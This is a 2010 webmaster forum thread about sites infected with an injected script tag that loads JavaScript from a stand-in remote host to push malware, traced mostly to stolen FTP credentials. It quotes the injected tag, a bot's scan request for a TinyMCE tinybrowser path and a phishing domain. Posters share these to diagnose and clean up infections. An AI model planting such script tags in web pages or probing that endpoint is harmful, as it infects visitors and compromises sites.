homepage Welcome to WebmasterWorld Guest from 54.204.249.184
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque

Webmaster General Forum

    
What is the origin/cause of this injection?
rocknbil




msg:4169545
 9:56 pm on Jul 13, 2010 (gmt 0)

Came across this today with a client's site I'm subcontracting for.

<script type="text/javascript" src="hxxp://example.com:8080/anyfile.js"></script>
<!--123blahblah-unique-identifier-here45678-->

Pages with it are attempting to install malware (of course.)

I've seen it on a bluehost instance, other reports are jumping on goDaddy and other hosting services, so it's obviously not a specific host problem.

This instance has a modX CMS, but have read blogs about it attacking WordPress, so it's not specific to software.

This site is using Cpanel, but have read some reports of some users using other control panels.

The domain names vary, the file names vary, but the one hitting this site WAS found when Googled (it's not anyfile.js)

I read many comments ranging from a compromised DNS modification using credentials of someone's compromised computer to a database injection - which really seems to be the only common thread between the various reports, a database.

All of the documents I read searching it down were recent, like YESTERDAY, not three year old posts. Though the attack isin't new, this round of it appears to be.

My AVG blocked it immediately, and I'm still digging around on this site, in the database, etc., just wondering if anyone recognizes it and knows it's point of entry.

 

rocknbil




msg:4170162
 7:45 pm on Jul 14, 2010 (gmt 0)

Database clean.

tiny_mce is on the site, and nearly all .js files were modified, most index.html/.php files modified, with code appended to the tail of the content of whatever was on the page.

All passworded accounts - CPanel, FTP, etc. changed, cleaned up over 500 instances of the code . . . it hasn't been back, yet.

Found some stuff on vulnerabilities in tiny_mce, but nothing definitive and very old documents, beginning to wonder if tiny_mce was the culprit or as I said, compromised computer of prev. developer. Still digging for the cause of the hack but the client is extremely happy. Today. :-)

coopster




msg:4170279
 12:20 am on Jul 15, 2010 (gmt 0)

FTP. 9 times out of 10 it was a client pc issue and they exposed their FTP credentials to the virus on their own pc, or the pc of anybody else that has access to the site.

rocknbil




msg:4170307
 1:48 am on Jul 15, 2010 (gmt 0)

Thanks, that's what I figured but had read a lot of vague info pointing to tiny_mce as a possible cause and wondering if I was missing something. The mods/support at their forum don't seem to show any indication of a problem.

I was "kinda tipped off" by the client claiming they can't get ahold of the original developer. His comp is probably in a black hole somewhere . . .

Dijkgraaf




msg:4171137
 11:48 pm on Jul 15, 2010 (gmt 0)

Hi Rocknbill

I saw some some bot scanning for the following recently.
So possibly there is a vulnerability there.

GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0

Searching for the above got me a page about the Metasploit Framework.

Do you see something like the above in your web logs?

adrianTNT




msg:4182709
 7:30 pm on Aug 5, 2010 (gmt 0)

I was also affected by this same type of malware as above,

<script type="text/javascript" src="hxxp://example.RU/anyfile.js"></script>
<!--123blahblah-unique-identifier-here45678-->

Sites on two different servers were affected so I do not think it started by a script/backdoor on the server.
I do not use wordpress on affected sites.

I clicked a link inside an email, it was made like coming from Vimeo ("Vimeo Registration Confirmation") but it was not, malware email link pointed to webwinkelnurlaila[DOT]nl (I hope is ok to post link)
Clicking that link shown system error about an EXE not being found (like on local computer), computer acted strange so I did a system restore.

I had FTP info saved in Adobe Dreamweaver so I think that is how it modified my remote files.

It affected index.html, index.php and many .js files, in all files it added links to js files inside .ru URLs.

If we do not save FTP info then we are exposed to keyloggers.

The date of modified files were all around 2 hours period (before I did a system restore locally in XP), so I was able to search remote files by date modified and I found all modified files.

Changed FTP password on affected sites too, I hope it will not come back.

rocknbil




msg:4183678
 7:07 pm on Aug 7, 2010 (gmt 0)

Do you see something like the above in your web logs?


I'm always called in afterwards, and the cases I've looked at are on shared hosting with one of those logs that are only there if you turn them on. Which the owners don't have the foresight to do.

Clicking that link shown system error about an EXE not being found


What you should have gotten was an alert threat by your AVG, unless this particular bug wasn't in your database yet. I think you just might have contracted it. Some of these things can persist through restores (I have heard, not experienced) so just stay on your toes, hard to say if you're safe or not.

adrianTNT




msg:4183682
 7:23 pm on Aug 7, 2010 (gmt 0)

I used "Avast free" at the time I got infected.

Good to know: My iTunes account was hacked today, it was a hard week for me :)

I used to laugh at people that get their info stolen, accounts hacked, etc and now it is happening to me.

The thief ordered around $50 from iTunes store using the saved PayPal info at iTunes.

I want to believe these two were not related but there is a chance that the virus sends actual passwords to their masters and later they try to login to iTunes, PayPal, FaceBook, popular services, etc.
My iTunes password was weak though. An if actual thief had the passwords I use, I am thinking I would see damages to servers and paypal first, before iTunes.
Also, I found many users complaining about their accounts being hacked.
I didnt used iTunes for months, so it was not by KeyLoggers or password saved on computer.

incrediBILL




msg:4190406
 3:03 am on Aug 22, 2010 (gmt 0)

Avast free doesn't have web protection.

Being cheap got you hacked.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved